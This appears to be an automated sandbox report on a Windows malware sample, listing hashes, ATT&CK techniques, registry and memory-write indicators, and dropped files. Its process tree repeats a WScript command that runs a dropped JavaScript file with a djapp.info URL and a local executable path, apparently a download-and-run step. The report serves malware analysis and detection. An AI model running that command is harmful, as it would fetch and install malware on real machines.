097f427d778c03a8fe97d7e2ecf07a0650c94b2dc84720455f23683d95786d64

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
12/10/2024, 02:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe
Size

184KB
MD5

381b8f81eff4023892ca415ffb3aea2e
SHA1

4dffc54a1a64d36a4e2d8909e521f85c1793ef3b
SHA256

097f427d778c03a8fe97d7e2ecf07a0650c94b2dc84720455f23683d95786d64
SHA512

1070d1ea9a0d2c846252672ff1544e707b8067b044d55836803c7da3fdf9c77eab2efc2910a83d572d0cd174db56a801a191e5733d406d3f630e1689d9c90e32
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Pz:/7BSH8zUB+nGESaaRvoB7FJNndnwz

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2852	WScript.exe
8	2852	WScript.exe
10	2852	WScript.exe
13	1696	WScript.exe
14	1696	WScript.exe
16	3008	WScript.exe
17	3008	WScript.exe
19	1916	WScript.exe
20	1916	WScript.exe
22	2356	WScript.exe
23	2356	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 2852	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2852	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2852	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2852	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	30
PID 2496 wrote to memory of 1696	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	32
PID 2496 wrote to memory of 1696	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	32
PID 2496 wrote to memory of 1696	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	32
PID 2496 wrote to memory of 1696	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	32
PID 2496 wrote to memory of 3008	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	34
PID 2496 wrote to memory of 3008	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	34
PID 2496 wrote to memory of 3008	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	34
PID 2496 wrote to memory of 3008	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	34
PID 2496 wrote to memory of 1916	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	36
PID 2496 wrote to memory of 1916	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	36
PID 2496 wrote to memory of 1916	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	36
PID 2496 wrote to memory of 1916	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	36
PID 2496 wrote to memory of 2356	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	38
PID 2496 wrote to memory of 2356	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	38
PID 2496 wrote to memory of 2356	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	38
PID 2496 wrote to memory of 2356	2496	381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\381b8f81eff4023892ca415ffb3aea2e_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf310F.js" http://www.djapp.info/?domain=TxqTZdNLMM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf310F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2852
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf310F.js" http://www.djapp.info/?domain=TxqTZdNLMM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf310F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1696
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf310F.js" http://www.djapp.info/?domain=TxqTZdNLMM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf310F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf310F.js" http://www.djapp.info/?domain=TxqTZdNLMM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf310F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1916
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf310F.js" http://www.djapp.info/?domain=TxqTZdNLMM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf310F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
d5cfe47b01da51e4f8bde52d76b1ff47

SHA1
df36b35071dd52eadf7e08b5d4059fbd0722814c

SHA256
604d05bb8ef5167aad74f1679f340248c0e77fd703235999f62938ea864bd536

SHA512
49b00619bfd4747c17c53aab29d04da95aee0ffc045331c399d5883465a169caac88e4addd295365b8754bc066bcb98e108e38aa41caf48bb559aaee170b9d5e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
871057e9326008a0297acd7e3507afbb

SHA1
970b63870d621d32d0fb28567ee5d37cea1d3077

SHA256
df7d0b7cdafad1494ed3dfa5755e4b9625595a14d98705e0a745111dbb5e60cb

SHA512
d8d558e76a1ac957766a7d15ccdce2b3ff106655401b810b86c8420c27c3579a0912e360fd0ec2854d6dc87ecbc335fef320b9b2b43816d8c61a64b75f6fb53c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
e35b76212297d563ab141e3761d19e62

SHA1
be70ae69a846b136b9d6c495f81385ab98cda0dc

SHA256
6f20e1c8b60b43607ee208f0e065158e52ff5969d8a2e5f3a2ae985e25092089

SHA512
b3795c9669c17d7f1a7c71abec7ecb6bb6ad829637e0f426d055c8d854edb6dd413c1d9b8adb10e5c77088b69531281fdc27a09cc1eaf79904cf2bf6b11be756

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\domain_profile[1].htm

Filesize
6KB

MD5
251f7f543df9348266f7c5a4d02213e4

SHA1
af2abe856ebab4df9fc6afa5f68f95bb803a0079

SHA256
3f68c0afa6fce02b6d693f3c8fe6417897ceea4b105388a08f8b3271138680ed

SHA512
ff26d9e57b7ed8862162fb3be3ce851af422d36ecab689a4c2461d095ae61ef92740b3784c7dc32f2a3ff8e9fc6823e7f3f5b393e99ef515797810e48c0e1770

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\domain_profile[1].htm

Filesize
6KB

MD5
10745bb98f51a5f023a1603c50a46e76

SHA1
a8fb40c0a999e88aa66644b8482c85ef4ed8eec7

SHA256
7323e3e10112a501815e816af3d2c7eb10b9658b94b82cd48080a2a70a518d16

SHA512
9f454bea68b66178009193fb30627f6d85cf87e096789fbf0c4462a1b91f015eefadbf45a71670e9f0f3aace45a271e59fb610ad7902571bd67a9f709fb2cd8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\domain_profile[1].htm

Filesize
6KB

MD5
dfe485ccebdeeac4865d5b37cf6bc41d

SHA1
a7e247a85e0b6303ff7b81940c22eab1ede79f18

SHA256
702c82391c518ddbef2a7571446a8d1e3dd50b2db354f94eb112fd30bd6c134d

SHA512
3d752c0451dbaa14ff3111143d11def318b408c00cf675454f8ccf2e0d8bed6c602f444fd8443576a41a2b7e8b75d650165b499534813c8cb605e16f79bef468

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\domain_profile[1].htm

Filesize
6KB

MD5
e80182326eea789ca469de898805f381

SHA1
378ecd84a5f96f32a23a89a3b6dac1dc1968ba18

SHA256
c6599e4a84511baf81179eda5b74cf77fe6307fef1fec9b2c6c6b8df51952848

SHA512
d2906c75fee921e00ed6226dba5c2d673c8bfcc84f046ada358f8f94e80fee513a38eac3b8d86f405fb4fb83079f424b5b0673d0a2bf86a9caf8f9ac32586807

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\domain_profile[1].htm

Filesize
6KB

MD5
ae3249b2b05732cb9c64248b63df7589

SHA1
275b2ab1fb91850cc352a74ba3cd01913a704c4a

SHA256
9090cfe8070af07bfc89be26ed7922b0087473fbfcfdaee938ad4603fd34fee4

SHA512
91edc8f4e1189095a3675ef4b1265d30e337bf204ebead3c87cc9f25ec29acfea159fd5c3e9560686535e2681d9aeb97fd59776fdcbf454f2a639217baebd582

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab784B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar911A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf310F.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NUR2YJ8E.txt

Filesize
177B

MD5
9717bef2d43c25f4ad90dc67506309bc

SHA1
cf53b6c97d7affa0e75618d8d5cd57d9dac13667

SHA256
24a4f2bac21fa6df79996fd8f56f942a936d9a416d6df6e8ba92ecb863f3be02

SHA512
6be8ed32875dece398528029dd39934e7b88b1d65c55cdeb103e58eb9f3d7a28e5e93dd17656680b328da7eef3154bc3960deec233ad4b3ef5b4622b918986a3

Download Submit